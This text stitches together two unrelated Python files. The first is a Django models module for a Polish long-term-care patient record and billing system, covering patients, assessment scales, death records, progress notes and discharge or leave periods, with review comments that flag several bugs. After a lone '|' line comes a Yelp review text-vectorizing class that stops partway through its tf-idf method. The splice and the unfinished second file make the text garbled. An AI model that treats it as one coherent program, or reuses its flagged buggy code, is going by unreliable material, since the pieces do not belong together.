# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.urls import reverse
from django.contrib.auth.models import AbstractUser, Group
from django.db.models import Q
import datetime
from django.db import models
from .validators import *
from .managers import *
from django.core.exceptions import ValidationError
import pytz
import calendar
from django.utils import timezone
import itertools
from django.shortcuts import get_object_or_404
from django.db.models.signals import post_save
from django.dispatch import receiver
utc = pytz.timezone('Europe/Warsaw')
def date_validator(data):
    """Normalize a datetime-like value to a plain date.

    Returns data.date() when the object provides a .date() method (i.e. a
    datetime); anything else — an existing date, None, a string — is returned
    unchanged.  The original bare `except: pass` swallowed every error type;
    narrowing to AttributeError keeps the same fallback behaviour while no
    longer hiding unrelated failures.
    """
    try:
        return data.date()
    except AttributeError:
        return data
#User Model
class CustomUser(AbstractUser):
    """Hospital staff account; `department` drives group assignment (see the
    post_save signal handler below)."""
    department_choices = (('lekarz','lekarz'),('pielegniarka', 'pielegniarka'),('psycholog','psycholog'),('farmaceuta','farmaceuta'),('administracja','administracja'))
    # Professional licence number.  NOTE(review): unique=True combined with
    # blank=True means two users saved with an empty PWZ will collide — confirm.
    PWZ = models.CharField(max_length=10, blank = True, unique=True)
    department = models.CharField(max_length=20, choices = department_choices)
    def get_username(self):
        # NOTE(review): overrides AbstractUser.get_username (normally the
        # login name) to return the display name — confirm callers expect this.
        return self.first_name+ ' '+ self.last_name
# Automatically add a newly created user to the group named after their
# department.
@receiver(models.signals.post_save, sender=CustomUser)
def post_save_user_signal_handler(sender, instance, created, **kwargs):
    # Runs after every CustomUser save; only acts on the initial creation.
    # Group.objects.get raises Group.DoesNotExist if the department group has
    # not been created beforehand.
    if created:
        group = Group.objects.get(name=instance.department)
        instance.groups.add(group)
        # Re-save the instance; this re-triggers post_save, but with
        # created=False, so there is no infinite loop.
        instance.save()
#App Models
class BaseModel(models.Model):
    """Abstract base adding creation/modification timestamps to every model."""
    created = models.DateTimeField(auto_now_add = True)   # set once, on insert
    modified = models.DateTimeField(auto_now = True)      # refreshed on every save
    class Meta:
        abstract = True
class Choroba(models.Model):
    """Disease dictionary entry: diagnostic code plus human-readable name."""
    kod = models.CharField(max_length=6)
    nazwa = models.CharField(max_length=100)
    def __str__(self):
        return self.kod + " " +self.nazwa
#Main Model
class Pacjent(BaseModel):
    """Patient record: identity, admission paperwork, medical data, and the
    day-counting helpers used for monthly billing (rozlicz)."""
    #--Choices
    plec_choices = (('M', 'Mezczyzna'),('K','Kobieta'))
    tryb_choices = (('PILNY', 'PILNY'),('STABILNY','STABILNY'))
    #--Default
    slug = models.SlugField()   # always set to the PESEL in save()
    #--Dowod osobisty (identity-card data)
    imie = models.CharField(max_length=50)
    nazwisko = models.CharField(max_length=50)
    nazwisko_rodowe = models.CharField(max_length = 50, blank = True)
    pesel = models.CharField(max_length=11, validators = [validate_pesel], unique = True)
    plec = models.CharField(max_length=1, choices=plec_choices)
    adres =models.CharField(max_length=500, blank=True)
    miejsce_urodzenia = models.CharField(max_length = 50, blank = True)
    imiona_rodzicow = models.CharField(max_length = 100, blank = True)
    nr_dowodu = models.CharField(max_length = 10, blank = True, validators = [validate_IDnr])
    #--Legitymacja ZUS (social-insurance card)
    nr_leg_zus = models.CharField(max_length = 24, blank = True, validators = [validate_nr_leg_zus])
    data_wydania_zus = models.DateField(null = True, blank = True)
    data_waznosci_zus = models.DateField(null = True, blank = True)
    #--Wniosek (admission application / referring-hospital paperwork)
    nr_ksiegi = models.CharField(max_length=9, blank=True)
    osoba_kontaktu = models.TextField(blank=True, verbose_name=("Osoba do kontaktu"))
    wysokosc_swiadczenia = models.PositiveSmallIntegerField(null = True, blank = True)
    data_przyjecia = models.DateField()
    tryb_przyjecia = models.CharField(max_length = 8, choices=tryb_choices, blank = True)
    data_skierowania = models.DateField(null = True, blank = True)
    pwz_zlecajacego =models.IntegerField(null = True, blank = True, validators = [validate_PWZ])
    oddzial_zlecajacego = models.CharField(max_length = 50, blank = True, verbose_name=('Nazwa oddziału kierującego'))
    kod_oddzial_zlecajacego = models.CharField(max_length = 4, blank = True, verbose_name=("Kod oddziału VIII"))
    regon_szpitala = models.CharField(max_length = 9, blank = True)
    nazwa_szpitala = models.CharField(max_length = 60, blank = True)
    nr_rej_szpitala = models.CharField(max_length = 12, blank = True, verbose_name=("Numer rejestracyjny szpitala I"))
    nr_umowy_szpitala = models.CharField(max_length = 10, blank = True, verbose_name=("Numer umowy szpitala"))
    nr_wew_oddzialu = models.CharField(max_length = 3, blank = True, verbose_name=("Kod oddziału VII"))
    #--Medyczne (medical data)
    wzrost = models.PositiveSmallIntegerField(null = True, blank = True)
    waga = models.PositiveSmallIntegerField(null = True, blank = True)
    epikryza = models.TextField(blank=True)
    zalecenia = models.TextField(blank=True)
    wyniki = models.TextField(blank=True)
    chorobowosc = models.ManyToManyField(Choroba, through = 'Chorobowosc',related_name='pacjent_choroba', symmetrical = False)
    choroby = models.TextField(blank=True)
    #--Managers
    wszyscy = WszyscyManager()
    class Meta:
        verbose_name_plural = "Pacjenci"
        verbose_name = "Pacjent"
        ordering = ['nazwisko']
    def save(self, *args, **kwargs):
        # The slug is simply the (unique) PESEL number.
        self.slug = self.pesel
        try:
            # Book number = previous sequence number + 1 with a "/<year>"
            # suffix; [:-5] strips the "/YYYY" suffix of the latest record.
            self.nr_ksiegi = str(str(int(Pacjent.wszyscy.latest('created').nr_ksiegi[:-5])+1)+"/"+str(datetime.datetime.today().year))
        except:
            # NOTE(review): bare except — the very first record, or any parse
            # error, silently resets the book number to '00/0000'.
            self.nr_ksiegi = '00/0000'
        return super(Pacjent, self).save( *args, **kwargs)
    def get_absolute_url(self):
        return reverse('pacjent_detail', args=[str(self.slug)])
    #Policz wszystkie dni od poczatku pobytu
    def policz_pobyt(self):
        # Every calendar date from admission up to the date of death (when a
        # Zgon record exists) or today otherwise.
        dates=[]
        zacznij = self.data_przyjecia
        try:
            skoncz = self.zgon.data
        except:
            # No related Zgon record: the patient is still admitted.
            skoncz = datetime.datetime.today().date()
        delta = int((skoncz - zacznij).days)
        for i in range(delta+1):
            if skoncz >= zacznij:
                dates.append(zacznij)
                zacznij += datetime.timedelta(days=1)
        return dates
    #Policz dni pobytu w zadanym okresie
    def pobyt_w_miesiacu(self,data_od, data_do):
        # Stay dates restricted to the inclusive [data_od, data_do] window.
        data_od = date_validator(data_od)
        data_do = date_validator(data_do)
        return set([ date for date in self.policz_pobyt() if data_do >= date >= data_od])
    #Rozlicz konkretnego pacjenta w podanych datach
    def rozlicz(self,data_od, data_do):
        # Settlement buckets for the billing window: discharge days, leave
        # days, tube-feeding days split by Glasgow score (>8 vs <=8), and the
        # remaining plain stay days.  Feeding days are clipped to actual stay
        # days, then removed from the plain-stay bucket.
        data_od = date_validator(data_od)
        data_do = date_validator(data_do)
        dni_wypis = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.wypis_set.all()]))
        dni_przepustka = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.przepustka_set.all()]))
        dni_zywienie_6 = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.zywienie_set.all().filter(glasgow__gt=8)]))
        dni_zywienie_7 = set(itertools.chain.from_iterable([el.days_in_month(data_od, data_do) for el in self.zywienie_set.all().filter(glasgow__lte=8)]))
        dni_pobyt = self.pobyt_w_miesiacu(data_od,data_do) - dni_wypis - dni_przepustka
        dni_zywienie_6.intersection_update(dni_pobyt)
        dni_zywienie_7.intersection_update(dni_pobyt)
        dni_pobyt = dni_pobyt - dni_zywienie_6 - dni_zywienie_7
        return dni_pobyt, dni_zywienie_6, dni_zywienie_7, dni_wypis, dni_przepustka
    def __str__(self):
        # NOTE(review): `dzis` is computed but never used.
        dzis = datetime.datetime.today().date()
        return self.nazwisko + " " +self.imie
class Chorobowosc(models.Model):
    """Through-model linking a patient to one of their diagnosed diseases."""
    pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE, related_name = 'pacjent_obiekt')
    choroba = models.ForeignKey(Choroba, on_delete=models.CASCADE)
    def get_absolute_url(self):
        return reverse('choroby_update', kwargs = {'slug':self.pacjent.slug} )
#Base for zgon, dekursus pielegniarki, lekarza i psychologa
class PointBase(BaseModel):
    """Abstract base for single-date, per-patient entries authored by a user
    (death record, doctor/nurse/psychologist progress notes, scales)."""
    data = models.DateField(default = timezone.now)
    pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE)
    user = models.ForeignKey(CustomUser, on_delete=models.PROTECT)
    class Meta:
        abstract = True
    def __str__(self):
        return str(self.id)
    def get_absolute_url(self):
        # The URL name is the lower-cased name of the concrete subclass,
        # e.g. 'norton' or 'zgon'.
        return reverse(str(self.__class__.__name__).lower(), kwargs = {'slug':self.pacjent.slug} )
class Odlezyna(BaseModel):
    """Pressure-ulcer (bedsore) site on a patient's body."""
    lokalizacja = models.CharField(max_length=200)   # anatomical location
    pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE)
    def __str__(self):
        return self.lokalizacja
    def get_absolute_url(self):
        return reverse('odlezyna', kwargs = {'slug':self.pacjent.slug} )
class OcenaOdlezyny(BaseModel):
    """Dated severity assessment (grade I-V) of one pressure-ulcer site."""
    stopien_choices = ((1,'I stopień – blednące po lekkim ucisku zaczerwienienie, które jest efektem reaktywnego przekrwienia.'),
                       (2,'II stopień – nieblednące zaczerwienienie, rumień nie ustępuje po zniesieniu ucisku.'),
                       (3,'III stopień – uszkodzenie pełnej grubości skóry do tkanki podskórnej.'),
                       (4,'IV stopień – uszkodzenie obejmuje tkankę podskórną.'),
                       (5,'V stopień – głębsza martwica obejmuje głębsze tkanki.'))
    odlezyna = models.ForeignKey(Odlezyna, on_delete = models.CASCADE)
    data = models.DateField(default = timezone.now)
    user = models.ForeignKey(CustomUser, on_delete=models.PROTECT)
    stopien = models.PositiveSmallIntegerField(choices= stopien_choices)   # ulcer grade 1-5
    interwencja = models.TextField(blank = True)                           # intervention taken
    def get_absolute_url(self):
        return reverse('odlezyna', kwargs = {'slug':self.odlezyna.pacjent.slug} )
class Norton(PointBase):
    """Norton pressure-ulcer risk assessment: five 1-4 sub-scores plus their
    cached sum (recomputed on every save)."""
    fizykalny_choices = ((4,'4.Dobry'),(3,'3.Dość dobry'),(2,'2.Średni'),(1,'1.Bardzo ciężki'))
    swiadomosc_choices = ((4,'4.Pełna przytomność i świadomość'),(3,'3.Apatia dobry'),(2,'2.Zaburzenia świadomośći'),(1,'1.Stupor lub śpiączka'))
    aktywnosc_choices = ((4,'4.Chodzi samodzielnie'),(3,'3.Chodzi z asystą'),(2,'2.Porusza sie na wózku'),(1,'1.Leżący'))
    samodzielnosc_choices = ((4,'4.Pełna'),(3,'3.Organiczona'),(2,'2.Bardzo ograniczona'),(1,'1.Całkowita niesprawność'))
    zwieracze_choices = ((4,'4.Pełna sprawność'),(3,'3.Sporadyczne moczenie'),(2,'2.Zazwyczaj nietrzymanie moczu'),(1,'1.Całkowita nietrzymanie stolca'))
    fizykalny = models.PositiveSmallIntegerField(choices = fizykalny_choices, verbose_name = 'Stan fizykalny', default=4)
    swiadomosc = models.PositiveSmallIntegerField(choices = swiadomosc_choices, verbose_name = 'Stan świadomośći', default=4)
    aktywnosc = models.PositiveSmallIntegerField(choices = aktywnosc_choices, verbose_name = 'Aktywność (przemieszczanie sie)', default=4)
    samodzielnosc = models.PositiveSmallIntegerField(choices = samodzielnosc_choices, verbose_name = 'Samodzielność przy zmianie pozycji', default=4)
    zwieracze = models.PositiveSmallIntegerField(choices = zwieracze_choices, verbose_name = 'Czynność zwieraczy', default=4)
    suma = models.PositiveSmallIntegerField(null=True)   # cached total, filled in save()
    def save(self, *args, **kwargs):
        # Recompute the cached total before persisting.
        # FIX: accept and forward the standard Model.save() arguments
        # (force_insert, update_fields, using, ...); the original
        # zero-argument override broke any caller passing them.
        self.suma = sum([self.fizykalny, self.swiadomosc, self.aktywnosc, self.samodzielnosc, self.zwieracze])
        return super().save(*args, **kwargs)
class Barthel(PointBase):
    """Barthel index of activities of daily living: ten sub-scores plus their
    cached sum (recomputed on every save)."""
    posilki_choices = ((0,'0-nie jest w stanie samodzielnie jeść'),(5,'5-potrzebuje pomocy lub wymaga zmodyfikowanej diety '),(10,'10-samodzielny, niezależny '))
    przemieszczanie_choices = ((0,'0- nie jest w stanie, nie zachowuje równowagi przy siadaniu'),(5,'5-większa pomoc. może siedzieć'),(10,'10-mniejsza pomoc'),(15,'15-samodzielny'))
    higiena_choices = ((0,'0- potrzebuje pomocy przy wykonywaniu czynności osobistych '),(5,'5-niezależny'))
    wc_choices = ((0,'0-zależny'),(5,'5-częściowo zależny'),(10,'10-niezależny'))
    mycie_choices = ((0,'0-zależny'),(5,'5-niezależny'))
    poruszanie_choices = ((0,'0-nie porusza się'),(5,'5-niezależny poruszający się na wózku'),(10,'10-spacery z pomocą jednej osoby, na odległość > 50m '),(15,'15-niezależny >50m'))
    schody_choices = ((0,'0-nie jest samodzielny '),(5,'5-potrzebuje pomocy '),(10,'10-samodzielny'))
    ubieranie_choices = ((0,'0-zależny'),(5,'5- potrzebuje pomocy'),(10,'10-niezależny'))
    stolec_choices = ((0,'0-nie panuje nad oddawaniem stolca'),(5,'5-przypadkowe zdarzenia bezwiednego oddawania stolca,'),(10,'10-kontroluje oddawanie stolca'))
    mocz_choices = ((0,'0- nie panuje nad oddawaniem moczu, cewnik'),(5,'5- przypadkowe zdarzenia bezwiednego oddawania moczu'),(10,'10- kontroluje oddawanie moczu'))
    posilki = models.PositiveSmallIntegerField(choices = posilki_choices, default = 0, verbose_name = 'Spożywanie posiłków ')
    przemieszczanie = models.PositiveSmallIntegerField(choices = przemieszczanie_choices, default = 0, verbose_name = 'Przemieszczanie się (z łóżka na krzesło i z powrotem / siadanie) ')
    higiena = models.PositiveSmallIntegerField(choices = higiena_choices, default = 0, verbose_name = 'Utrzymanie higieny osobistej ')
    wc = models.PositiveSmallIntegerField(choices = wc_choices, default = 0, verbose_name = 'Korzystanie z toalety (WC) ')
    mycie = models.PositiveSmallIntegerField(choices = mycie_choices, default = 0, verbose_name = 'Mycie, kąpiel całego ciała ')
    poruszanie = models.PositiveSmallIntegerField(choices = poruszanie_choices, default = 0, verbose_name = 'Poruszanie się (po powierzchniach płaskich) ')
    schody = models.PositiveSmallIntegerField(choices = schody_choices, default = 0, verbose_name = 'Wchodzenie i schodzenie po schodach ')
    ubieranie = models.PositiveSmallIntegerField(choices = ubieranie_choices, default = 0, verbose_name = 'Ubieranie i rozbieranie się. ')
    stolec = models.PositiveSmallIntegerField(choices = stolec_choices, default = 0, verbose_name = 'Kontrolowanie stolca / zwieracza odbytu ')
    mocz = models.PositiveSmallIntegerField(choices = mocz_choices, default = 0, verbose_name = 'Kontrolowanie moczu / zwieracza pęcherza moczowego ')
    suma = models.PositiveSmallIntegerField(null=True)   # cached total, filled in save()
    def save(self, *args, **kwargs):
        # Recompute the cached total before persisting.
        # FIX: accept and forward the standard Model.save() arguments
        # (force_insert, update_fields, using, ...), matching the fix in
        # Norton; the original zero-argument override broke such callers.
        self.suma = sum([self.posilki, self.przemieszczanie, self.higiena, self.wc, self.mycie, self.poruszanie, self.schody, self.ubieranie, self.stolec, self.mocz])
        return super().save(*args, **kwargs)
class Zgon(PointBase):
    """Death record — at most one per patient (pacjent is the primary key),
    with the cause-of-death chain: underlying -> secondary -> direct."""
    pacjent = models.OneToOneField(Pacjent, on_delete = models.CASCADE, primary_key = True)
    wyjsciowa = models.ForeignKey(Choroba, on_delete=models.CASCADE, related_name='wyjsciowa_przyczyna', blank=True, null=True)
    wtorna = models.ForeignKey(Choroba, on_delete=models.CASCADE, related_name='wtorna_przyczyna', blank=True, null=True)
    bezposrednia = models.ForeignKey(Choroba, on_delete=models.CASCADE, related_name='bezposrednia_przyczyna', blank=True, null=True)
    godzina = models.TimeField()   # time of death (the date lives in PointBase.data)
    class Meta:
        verbose_name_plural = "Zgony"
    def __str__(self):
        return self.pacjent.nazwisko + " "+ self.pacjent.imie+" - "+ str(self.data)
    def get_absolute_url(self):
        return reverse('zgon', kwargs={'slug':self.pacjent.slug})
class Dekursus_lek(PointBase):
    """Doctor's progress note; `important` flags entries for highlighting."""
    tresc = models.TextField()
    important = models.BooleanField(default=False)
    class Meta:
        verbose_name_plural = "Dekursysy lekarskie"
        verbose_name = "Dekursus lekarski"
class Dekursus_piel(PointBase):
    """Nurse's progress note."""
    tresc = models.TextField()
    class Meta:
        verbose_name_plural = "Dekursysy pielęgniarskie"
        verbose_name = "Dekursus pielęgniarski"
class Dekursus_psych(PointBase):
    """Psychologist's progress note."""
    tresc = models.TextField()
    class Meta:
        verbose_name_plural = "Dekursysy psychologa"
        verbose_name = "Dekursus psychologa"
#Base for wypis, przepustka, zywienie
class PeriodBase(BaseModel):
    """Abstract base for per-patient date-range events (discharge, leave,
    feeding orders).  data_do == None means the period is still open."""
    data_od = models.DateTimeField(default = timezone.now, null=True)
    data_do = models.DateTimeField(blank=True, null=True)
    pacjent = models.ForeignKey(Pacjent, on_delete=models.CASCADE)
    user = models.ForeignKey(CustomUser, on_delete=models.PROTECT)
    class Meta:
        abstract=True
        ordering = ['-data_od']
    def get_absolute_url(self):
        # URL name equals the lower-cased concrete class name.
        return reverse(str(self.__class__.__name__).lower(), kwargs={'slug':self.pacjent.slug})
    def clean(self,*args, **kwargs):
        # Reject any overlap with another period of the same kind for this
        # patient: starting inside another, ending inside another, or fully
        # containing another closed period.
        class_name = str(self.__class__.__name__).lower()+"_set"
        q = getattr(self.pacjent, class_name).all().exclude(id__exact=self.id)
        przedzial_otwarty = q.filter(data_do__isnull=True)      # open-ended periods
        przedzial_zamkniety = q.filter(data_do__isnull=False)   # closed periods
        if przedzial_otwarty.filter(data_od__lte=self.data_od) \
                or przedzial_zamkniety.filter(data_od__lte=self.data_od).filter(data_do__gte=self.data_od):
            raise ValidationError("Data rozpoczecia pokrywa sie z juz istniejacym: {}".format(class_name[:-4]))
        elif self.data_do and (przedzial_otwarty.filter(data_od__lte=self.data_do) \
                or przedzial_zamkniety.filter(data_od__lte=self.data_do).filter(data_do__gte=self.data_do)):
            raise ValidationError("Data zakonczenia pokrywa sie z juz istniejacym: {}".format(class_name[:-4]))
        elif self.data_do and przedzial_zamkniety.filter(data_od__gte = self.data_od).filter(data_do__lte=self.data_do):
            raise ValidationError("Okresy {} zawieraja sie w sobie".format(class_name[:-4]))
        else:
            return super().clean(*args,**kwargs)
    def save(self, *args, **kwargs):
        class_name = str(self.__class__.__name__).lower()+"_set"
        q = getattr(self.pacjent, class_name).all().exclude(id__exact=self.id)
        # Auto-close this period the day before the next later one starts.
        if q.filter(data_od__gte=self.data_od):
            self.data_do = q.filter(data_od__gte=self.data_od).order_by('data_od').first().data_od - datetime.timedelta(days=1)
        # Clamp the start to the admission date.
        if self.data_od.date() < self.pacjent.data_przyjecia:
            self.data_od = self.pacjent.data_przyjecia
        try:
            # Clamp the end to the date of death when a Zgon record exists.
            if self.data_do.date() > self.pacjent.zgon.data:
                self.data_do = self.pacjent.zgon.data
            return super().save(*args, **kwargs)
        except:
            # NOTE(review): bare except — reached when there is no Zgon or
            # data_do is None, but it also swallows real errors raised by the
            # super().save() call inside the try and saves a second time.
            return super().save(*args, **kwargs)
    def list_of_dates(self):
        # NOTE(review): side effect — mutates self.data_od / self.data_do in
        # place, converting them from datetimes to dates (an open end becomes
        # "today" in the Warsaw zone via the misnamed `utc`).
        try:
            self.data_do = self.data_do.date()
        except:
            self.data_do = utc.localize(datetime.datetime.today()).date()
        dates=[]
        self.data_od = self.data_od.date()
        delta = int((self.data_do - self.data_od).days)
        zacznij = self.data_od
        for i in range(delta+1):
            if self.data_do >=zacznij:
                dates.append(zacznij)
                zacznij = zacznij + datetime.timedelta(days=1)
        return dates
    def days_in_month(self, data_od, data_do):
        # NOTE(review): the lower bound is exclusive here (date > data_od)
        # while Pacjent.pobyt_w_miesiacu uses an inclusive >= — confirm which
        # is intended for billing.
        data_od = date_validator(data_od)
        data_do = date_validator(data_do)
        return frozenset(date for date in self.list_of_dates() if data_do >= date > data_od)
    def __str__(self):
        data_od = str(date_validator(self.data_od))
        data_do = str(date_validator(self.data_do))
        return self.pacjent.imie + " "+ self.pacjent.nazwisko+" : "+data_od+ " - "+ data_do
class Zywienie(PeriodBase):
    """Tube-feeding order for a period; the Glasgow score splits billing into
    the >8 and <=8 buckets (see Pacjent.rozlicz)."""
    dieta_choices = (('Nutrison','Nutrison'),('Cubison','Cubison'),('Diason','Diason'),('Mix','Mix'),('Naprzemienna','Naprzemienna'))
    dieta = models.CharField(max_length=10, choices = dieta_choices)
    dieta_objetosc = models.CharField(max_length=4)   # feed volume
    woda_objetosc = models.CharField(max_length=4)    # water volume
    glasgow = models.PositiveSmallIntegerField()      # Glasgow Coma Scale score
    class Meta:
        verbose_name_plural = "Zlecenia żywienia"
class Wypis(PeriodBase):
    """Discharge record for a period, with the formal discharge mode."""
    tryb_choices = (('Zakończenie procesu terapeutycznego lub diagnostycznego', 'Zakończenie procesu terapeutycznego lub diagnostycznego'),
                    ('Skierowanie do dalszego leczenia w lecznictwie ambulatoryjnym','Skierowanie do dalszego leczenia w lecznictwie ambulatoryjnym'),
                    ('Skierowanie do dalszego leczenia w innym szpitalu','Skierowanie do dalszego leczenia w innym szpitalu'),
                    ('Wypisanie na własne żądanie','Wypisanie na własne żądanie'),
                    ('Osoba leczona samowolnie opuściła ZOL','Osoba leczona samowolnie opuściła ZOL'),
                    ('Wypisanie na podstawie art. 221 pkt 3 ustawy o ZOZ','Wypisanie na podstawie art. 221 pkt 3 ustawy o ZOZ'),
                    ('Zgon pacjenta','Zgon pacjenta'),
                    ('Osoba leczona, która samowolnie opuściła podmiot leczniczy','Osoba leczona, która samowolnie opuściła podmiot leczniczy'),
                    ('Koniec pobytu','Koniec pobytu')
                    )
    miejsce_wypisu = models.CharField(max_length=100, blank=True)   # discharge destination
    przyczyna_wypisu = models.TextField(blank=True)                 # discharge reason
    tryb = models.CharField(max_length=100, choices=tryb_choices)
    class Meta:
        verbose_name_plural = "Wypisy"
class Przepustka(PeriodBase):
    """Patient leave-of-absence for a period."""
    tresc = models.TextField(blank=True)
    class Meta:
        verbose_name_plural = "Przepustki"
class Rozliczany(models.Model):
    """Abstract per-patient settlement summary: day counts per billing code
    (2 = plain stay, 6/7 = feeding by Glasgow score) plus boundary dates."""
    class Meta:
        abstract = True
    pacjent = models.OneToOneField(Pacjent, on_delete = models.CASCADE, primary_key = True)
    dni_2 = models.PositiveSmallIntegerField(null = True, blank = True)
    dni_6 = models.PositiveSmallIntegerField(null = True, blank = True)
    dni_7 = models.PositiveSmallIntegerField(null = True, blank = True)
    dni_wypis =models.PositiveSmallIntegerField(null = True, blank = True)
    dni_przepustka =models.PositiveSmallIntegerField(null = True, blank = True)
    zgon_data = models.DateField(null = True, blank = True)
    przyjecie_data = models.DateField(null = True, blank = True)
    # NOTE(review): these are *class* attributes — one shared mutable list per
    # name for all instances and subclasses.  Appending from an instance leaks
    # state across objects; consider assigning them in __init__ instead.
    wypisy = []
    przepustki =[]
    zywienie_6 = []
    zywienie_7 = []
|
import os
import re
import gensim
import pickle
from nltk.corpus import stopwords, wordnet
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
from datetime import datetime
from gensim.models.doc2vec import Doc2Vec, TaggedDocument
from sklearn.feature_extraction.text import CountVectorizer, HashingVectorizer, TfidfVectorizer
from sklearn.decomposition import TruncatedSVD
class Vectorizer_():
    """Cleans the Yelp review corpus and pickles several document-vector
    representations (Doc2Vec DM/DBOW, hashing+LSA, tf-idf, tf-idf+LSA,
    count+LSA).

    NOTE(review): d2v_corpus is built from self.all_docs inside __init__,
    *before* fill_dictionary() has populated it, so it is always empty unless
    rebuilt by the caller — confirm the intended call order.
    """
    def __init__(self, path_to_dataset):
        # Path to the Yelp dataset folder on disk (uses '\\' separators).
        self.path_to_dataset = path_to_dataset
        self.lemmatizer = WordNetLemmatizer()
        self.stop_words = stopwords.words('english')
        self.corpus = [path_to_dataset+'\\negative', path_to_dataset+'\\positive']
        self.all_docs = {}   # filename -> preprocessed token list (see fill_dictionary)
        self.d2v_corpus = [TaggedDocument(doc, [i]) for i, doc in enumerate([v for v in self.all_docs.values()][0:601])]
    def space_division(self, text: str):
        """Insert a space after sentence punctuation glued to the next word
        ('end.Start' -> 'end. Start')."""
        wrong = re.findall("[a-z0-9A-Z][!?.:][A-Za-z]", text)
        corr = []
        for c in [list(el) for el in wrong]:
            c.insert(2, ' ')
            corr.append(c)
        crc = [''.join(it) for it in corr]
        for n in range(len(crc)):
            text = text.replace(wrong[n], crc[n])
        return text
    def space_inserting(self, text: str):
        """Split camelCase joins ('helloWorld' -> 'hello World')."""
        fal = re.findall("[a-z][A-Z]", text)
        tru = []
        for c in [list(el) for el in fal]:
            c.insert(1," ")
            tru.append(c)
        tr = [''.join(e) for e in tru]
        for n in range(len(tr)):
            text = text.replace(fal[n], tr[n])
        return text
    def filter_punct_and_numbers(self, text: str):
        """Replace everything but letters, whitespace, apostrophes and hyphens
        with spaces, lower-case the text, and collapse repeated whitespace."""
        not_needed = set(re.findall("[^A-Za-z\s'-]", text))
        for sym in not_needed:
            text = text.replace(sym, ' ').lower()
        for sp in re.findall("\s{2,}", text):
            text = text.replace(sp, " ")
        return text
    def filter_stop_words(self, text: str):
        """Split on single spaces and drop English stop words."""
        text = text.split(" ")
        # BUG FIX: the original referenced an undefined module-level
        # `stop_words` (NameError at runtime); the list lives on the instance.
        text = list(filter(lambda x: x not in self.stop_words, text))
        return text
    def filter_empties_and_dashes(self, text):
        """Drop empties, bare dashes and stop words from a token list, and
        strip a single leading or trailing hyphen from remaining tokens."""
        # BUG FIX: `stop_words` -> `self.stop_words` (undefined global before).
        text = list(filter(lambda x: x not in self.stop_words and x != '' and x != '-' and x != '--', text))
        for i in range(len(text)):
            if re.match('^-[a-z]+$', text[i]) or re.match('^[a-z]+-$', text[i]):
                text[i] = text[i].replace('-', '')
        return text
    def final_preprocess(self, text):
        """Re-tokenize, drop stop words and contraction fragments, and
        lemmatize using POS tags mapped onto WordNet categories."""
        tag_dict = {"J": wordnet.ADJ,
                    "N": wordnet.NOUN,
                    "V": wordnet.VERB,
                    "R": wordnet.ADV}
        text = " ".join(text)
        # BUG FIX: `stop_words` -> `self.stop_words` (undefined global before).
        text = [word for word in word_tokenize(text) if word not in self.stop_words and not re.match("[a-z]?'[a-z]", word)]
        fin_text = []
        for c in pos_tag(text):
            if c[1][0].upper() in tag_dict.keys():
                fin_text.append(self.lemmatizer.lemmatize(c[0], tag_dict[c[1][0].upper()]))
            else:
                fin_text.append(c[0])
        return fin_text
    def preprocess(self, text):
        """Run the full cleaning pipeline on one raw document string."""
        text = self.space_division(text)
        text = self.space_inserting(text)
        text = self.filter_punct_and_numbers(text)
        text = self.filter_stop_words(text)
        text = self.filter_empties_and_dashes(text)
        text = self.final_preprocess(text)
        return text
    def fill_dictionary(self):
        """Preprocess every file of both corpus folders into all_docs."""
        for c in self.corpus:
            for i in range(len(os.listdir(c))):
                self.all_docs[os.listdir(c)[i]] = self.preprocess(open(c + '\\' + os.listdir(c)[i], 'r', encoding='utf-8').read())
    def doc2vec_dm_vectorize(self):
        """Train a Doc2Vec DM model and pickle per-document inferred vectors."""
        doc2vec_dm_vectorized = {}
        start = datetime.now()
        my_dm = gensim.models.doc2vec.Doc2Vec(dm=1, vector_size=100, min_count=1, epochs=10)
        my_dm.build_vocab(self.d2v_corpus)
        my_dm.train(self.d2v_corpus, total_examples=my_dm.corpus_count, epochs=my_dm.epochs)
        for k in self.all_docs.keys():
            doc2vec_dm_vectorized[k] = my_dm.infer_vector(self.all_docs[k])
        finish = datetime.now()
        print("Doc2Vec_DM working time:", (finish-start).seconds)
        with open('doc2vec_dm.pickle', 'wb') as file:
            pickle.dump(doc2vec_dm_vectorized, file)
    def doc2vec_dbow_vectorize(self):
        """Train a Doc2Vec DBOW model and pickle per-document inferred vectors."""
        doc2vec_dbow_vectorized = {}
        start = datetime.now()
        my_dbow = gensim.models.doc2vec.Doc2Vec(dm=0, vector_size=100, min_count=1, epochs=10)
        my_dbow.build_vocab(self.d2v_corpus)
        my_dbow.train(self.d2v_corpus, total_examples=my_dbow.corpus_count, epochs=my_dbow.epochs)
        for k in self.all_docs.keys():
            doc2vec_dbow_vectorized[k] = my_dbow.infer_vector(self.all_docs[k])
        finish = datetime.now()
        print("Doc2Vec_DBOW working time:", (finish - start).seconds)
        with open('doc2vec_dbow.pickle', 'wb') as f:
            pickle.dump(doc2vec_dbow_vectorized, f)
    def hashing_vectorize(self):
        """Hash 1-3 gram counts, reduce to 100 dims with SVD, and pickle."""
        hash_vectorized = {}
        work_corp = [" ".join(v) for v in self.all_docs.values()]
        start = datetime.now()
        vectorizer = HashingVectorizer(ngram_range=(1, 3), n_features=100000)
        svd = TruncatedSVD(n_components=100)
        hv = svd.fit_transform(vectorizer.fit_transform(work_corp).toarray())
        key_list = [k for k in self.all_docs.keys()]
        for i in range(len(key_list)):
            hash_vectorized[key_list[i]] = hv[i]
        finish = datetime.now()
        print("HashingVectorizer working time:", (finish - start).seconds)
        with open('hashing.pickle', 'wb') as file:
            pickle.dump(hash_vectorized, file)
    def tfidf_vectorize(self):
        """Compute dense tf-idf vectors over 1-3 grams and pickle them."""
        tfidf_vectorized = {}
        work_corp = [" ".join(v) for v in self.all_docs.values()]
        start = datetime.now()
        vectorizer = TfidfVectorizer(ngram_range=(1, 3))
        vs = vectorizer.fit_transform(work_corp)
        matr = vs.toarray()
        key_list = [k for k in self.all_docs.keys()]
        for i in range(len(key_list)):
            tfidf_vectorized[key_list[i]] = matr[i]
        finish = datetime.now()
